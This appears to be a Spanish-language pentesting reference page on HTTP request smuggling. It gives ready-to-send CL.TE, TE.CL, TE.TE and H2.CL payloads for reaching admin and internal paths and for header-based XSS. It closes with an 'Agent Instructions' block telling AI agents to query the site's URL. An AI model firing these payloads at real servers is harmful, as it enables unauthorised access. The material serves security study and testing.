# HTTP request smuggling ## Content-Length (CL) {% code lineNumbers="true" %} ```http POST / HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded Content-Length: 27 param1=value1¶m2=value2 ``` {% endcode %} ## Transfer-Encoding (TE) {% code lineNumbers="true" %} ```http POST / HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 1d param1=value1¶m2=value2 0 ``` {% endcode %} ``` 1d\r\nparam1=value1¶m2=value2\r\n0\r\n\r\n ``` ## CL.TE El proxy inverso utiliza el encabezado HTTP `Content-Length` (CL), el servidor web utiliza el encabezado HTTP `Transfer-Encoding` (TE). Ejemplo de identificación donde la respuesta correspondiente al segundo request sea un `405 Method Not Allowed` podría revelar que es vulnerable. {% tabs %} {% tab title="Request 1" %} {% code lineNumbers="true" %} ```http POST / HTTP/1.1 Host: example.com Content-Length: 10 Transfer-Encoding: chunked 0 HELLO ``` {% endcode %} {% endtab %} {% tab title="Request 2" %} {% code lineNumbers="true" %} ```http GET / HTTP/1.1 Host: example.com ``` {% endcode %} {% endtab %} {% endtabs %} Ejemplo de explotación general. {% code lineNumbers="true" %} ```http POST / HTTP/1.1 Host: example.com Content-Length: 50 Transfer-Encoding: chunked 0 POST /admin.php?param=value HTTP/1.1 Dummy: ``` {% endcode %} Ejemplo de explotación para obtener acceso a una ruta interna. {% code lineNumbers="true" %} ```http POST / HTTP/1.1 Host: example.com Content-Length: 54 Transfer-Encoding: chunked 0 POST /internal HTTP/1.1 Host: localhost Dummy: ``` {% endcode %} Ejemplo de explotación para reflected XSS en HTTP header. {% code lineNumbers="true" %} ```http POST / HTTP/1.1 Host: example.com Content-Length: 81 Transfer-Encoding: chunked 0 GET / HTTP/1.1 HTTP-Header-Vulnerable: "> Dummy: ``` {% endcode %} ## TE.TE Ofuscar el encabezado HTTP `Transfer-Encoding` (TE) en uno de los componentes para provocar una vulnerabilidad de CL.TE o TE.CL. ```sh Transfer-Encoding: testchunked Transfer-Encoding : chunked Transfer-Encoding:[\x09]chunked # [\x09] = tabulación horizontal Transfer-Encoding:[\x0b]chunked # [\x0b] = tabulación vertical Transfer-Encoding: chunked ``` ## TE.CL El proxy inverso utiliza el encabezado HTTP `Transfer-Encoding` (TE), el servidor web utiliza el encabezado HTTP `Content-Length` (CL). {% hint style="info" %} En la opción Repeater de Burp Suite, es importante desmarcar la opción "Update Content-Length", agregar los dos requests en un grupo de pestañas, y enviarlos utilizando la función "Send group in sequence (single connection)". {% endhint %} Ejemplo de identificación donde la respuesta correspondiente al segundo request sea un `400 Bad Request` podría revelar que es vulnerable. {% tabs %} {% tab title="Request 1" %} {% code lineNumbers="true" %} ```http GET / HTTP/1.1 Host: example.com Content-Length: 3 Transfer-Encoding: chunked 5 HELLO 0 ``` {% endcode %} {% endtab %} {% tab title="Request 2" %} {% code lineNumbers="true" %} ```http GET / HTTP/1.1 Host: example.com ``` {% endcode %} {% endtab %} {% endtabs %} Ejemplo de explotación general (GET). * 0x2a = 42 bytes {% tabs %} {% tab title="Request 1" %} {% code lineNumbers="true" %} ```http GET /404 HTTP/1.1 Host: example.com Content-Length: 4 Transfer-Encoding: chunked 2a GET /admin HTTP/1.1 Host: example.com 0 ``` {% endcode %} {% endtab %} {% tab title="Request 2" %} {% code lineNumbers="true" %} ```http GET /404 HTTP/1.1 Host: example.com ``` {% endcode %} {% endtab %} {% endtabs %} Ejemplo de explotación general (POST). * 0x83 = 131 bytes {% code lineNumbers="true" %} ```http GET / HTTP/1.1 Host: example.com Content-Length: 4 Transfer-Encoding: chunked 83 POST /index.php HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded Content-Length: 11 param=value 0 ``` {% endcode %} Ejemplo de explotación para obtener acceso a una ruta interna. * 0x2b = 43 bytes {% tabs %} {% tab title="Request 1" %} {% code lineNumbers="true" %} ```http GET /404 HTTP/1.1 Host: example.com Content-Length: 4 Transfer-Encoding: chunked 2b GET /internal HTTP/1.1 Host: localhost 0 ``` {% endcode %} {% endtab %} {% tab title="Request 2" %} {% code lineNumbers="true" %} ```http GET /404 HTTP/1.1 Host: example.com ``` {% endcode %} {% endtab %} {% endtabs %} ## HTTP/2 downgrading El proxy inverso utiliza HTTP/2, mientras que el servidor web utiliza HTTP/1.1. ### H2.CL / CL.0 El proxy inverso no valida correctamente que el encabezado HTTP `Content-Length` (CL) proporcionado sea correcto y, en su lugar, reescribe la solicitud a HTTP/1.1 utilizando el encabezado HTTP `Content-Length` (CL) defectuoso. {% code lineNumbers="true" %} ```http POST / HTTP/2 Host: example.com Content-Length: 0 POST /admin.php?param=value HTTP/1.1 Host: example.com ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://web.mrw0l05zyn.cl/explotacion/http-request-smuggling.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.